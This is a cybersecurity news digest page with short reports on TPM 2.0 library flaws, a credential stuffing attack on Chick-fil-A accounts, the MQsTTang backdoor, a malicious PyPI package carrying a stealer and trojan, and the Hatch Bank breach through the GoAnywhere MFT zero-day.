Hackerzhome

hackerzhome-logo-bg

Cybersecurity news all over the world

HACKERZHOME NEWS

March 3, 2023

Friday

Billions of IoT and enterprise devices are at risk due to new flaws in the TPM 2.0 library.

The Trusted Platform Module (TPM) 2.0 reference library specification has been found to contain two critical security flaws that could result in data exposure or privilege escalation.


Out-of-bounds writes are a worry for one of the vulnerabilities, CVE-2023-1017, while out-of-bounds reads are a concern for the other, CVE-2023-1018. Security firm Quarkslab is credited with finding and reporting the problems in November 2022.


The weaknesses, according to Quarkslab, can affect large tech vendors, businesses that use enterprise computers, servers, IoT devices, and embedded systems with a TPM, and “might harm Billions of devices.”


TPM is a hardware-based solution (i.e., a crypto-processor) created to offer secure cryptographic operations and physical security measures to thwart hacking attempts.


The TCG consortium pointed out that the flaws are caused by a lack of crucial length checks, resulting in buffer overflows that could open the door for the disclosure of private local information or the escalation of privileges.


To fix the bugs and reduce supply chain risks, users are advised to install the updates made available by TCG and other manufacturers.

NEWS 1
Billions of IoT and enterprise devices are at risk due to new flaws in the TPM 2.0 library.

Breaking news

LIVE

You are not up to date!

Subscribe to our newsletter and stay updated on cybersecurity news

Accounts were hacked in a months-long "automated" attack, according to Chick-fil-A.

Chick-fil-A, an American fast food company, has acknowledged that consumers’ accounts were compromised in a months-long credential stuffing assault, giving threat actors access to personal data and the ability to use saved reward balances.

Chick-fil-A created a support page at the time with instructions for customers on what to do if they see strange behavior on their accounts.

These accounts were sold for amounts between $2 and $200, depending on the rewards account balance and related payment options.

Customers who were affected by the breach are being warned by the fast food chain that threat actors who gained access to their accounts would also have had access to their name, email address, Chick-fil-A One membership number, mobile pay number, QR code, masked credit/debit card number, and the amount of Chick-fil-A credit (such as the balance of an e-gift card) on their account (if any).

The details could have included the last four digits of credit cards, phone numbers, physical addresses, and birthdays for some clients.
Following the hack, Chick-fil-A required customers to change their passwords, froze money in their accounts, and deleted any payment information that had been saved.

NEWS 2

For placing advertisements and promotions in this newspaper, or anywhere on our website, contact us through email at [email protected] or fill out this contact form.

Share this news:

March 3, 2023 /

Friday

Hackerzhome News

2

Did you know?
Linux Users Now Have Access To Iron Tiger Hackers’ Specialized Malware. Know more!

Chinese hackers use the new MQsTTang backdoor to attack European entities.

Chinese hackers use the new MQsTTang backdoor to attack European entities.

As part of an ongoing social engineering campaign that started in January 2023, the China-aligned Mustang Panda actor has been seen exploiting a previously unknown custom backdoor named MQsTTang.

In the wake of Russia’s all-out invasion of Ukraine last year, attack chains directed by the organization have increased their targeting of European entities.

Uncertainty surrounds the victimology of the new action, although a cybersecurity firm in Slovakia claimed that the counterfeit filenames are consistent with the group’s earlier efforts that targeted European political organizations.

But, ESET also noted assaults against unidentified targets in Australia, Australia, Taiwan, and Bulgaria, indicating a concentration on Europe and Asia.

Using a PlugX variant called Hodur and a Google Drive uploader tool, Avast revealed another set of attacks in December 2022 that were directed at political NGOs and government organizations in Myanmar and resulted in the exfiltration of sensitive data, including email dumps, files, court transcripts, interrogation reports, and meeting transcripts.

Also, a Go-based trojan named JSX and a sophisticated backdoor has known as HT3 has been discovered on an FTP server connected to the threat actor.

These tools are all used to spread malware to affected devices and include a number of previously unknown capabilities.

NEWS 3

Fully-Featured Data Stealer and Trojan Found in Python Package on PyPI, According to Experts

Fully-Featured Data Stealer and Trojan Found in Python Package on PyPI, According to Experts
NEWS 4

It was discovered that a malicious Python package that was posted to the Python Package Index (PyPI) had a remote access trojan and a fully functional information thief.

Kroll’s Cyber Threat Intelligence team discovered the package, colorfool, and the company has named the virus Color-Blind.

Similar to other malicious Python modules found in recent months, this one hides its code in the setup script, which directs users to a ZIP archive payload hosted on the Discord platform.

The file includes a Python script (code.py) with various modules built to steal cookies, record keystrokes, and even disable security software.

The usage of Cloudflare tunnels is similar to another attack, which used six bogus packages to disseminate a stealer-cum-RAT known as poweRAT, which was made public by Phylum last month.

The malware is packed with features and is capable of gathering passwords, shutting down programs, taking screenshots, logging keystrokes, opening arbitrary websites in a browser, executing instructions, grabbing information from cryptocurrency wallets, and even spying on victims via the web camera.

After the compromise of GoAnywhere MFT, Hatch Bank reveals a data leak.

Hackers stole the personal data of nearly 140,000 users from the company’s Fortra GoAnywhere MFT secure file-sharing platform, according to Hatch Bank, a fintech banking platform.

A financial technology company called Hatch Bank enables small businesses to use other financial institutions’ banking services.

Hatch claims that after reviewing the stolen data, they discovered that the intruders had taken the names and social security numbers of the victims.

The bank also stated that it is giving impacted people free access to credit monitoring services for a full year.

The ransomware group claims that they stole data over a ten-day period using Fortra’s GoAnywhere MFT secure file-sharing platform’s zero-day vulnerability.

The vulnerability, which is now identified as CVE-2023-0669, allows remote threat actors to access systems through remote code execution.

After finding that the vulnerability was being actively used in assaults, GoAnywhere informed its clients of it in the first few days of February.

After the compromise of GoAnywhere MFT, Hatch Bank reveals a data leak.
NEWS 5

For placing advertisements and promotions in this newspaper, or anywhere on our website, contact us through email at [email protected] or fill out this contact form.

Share this news: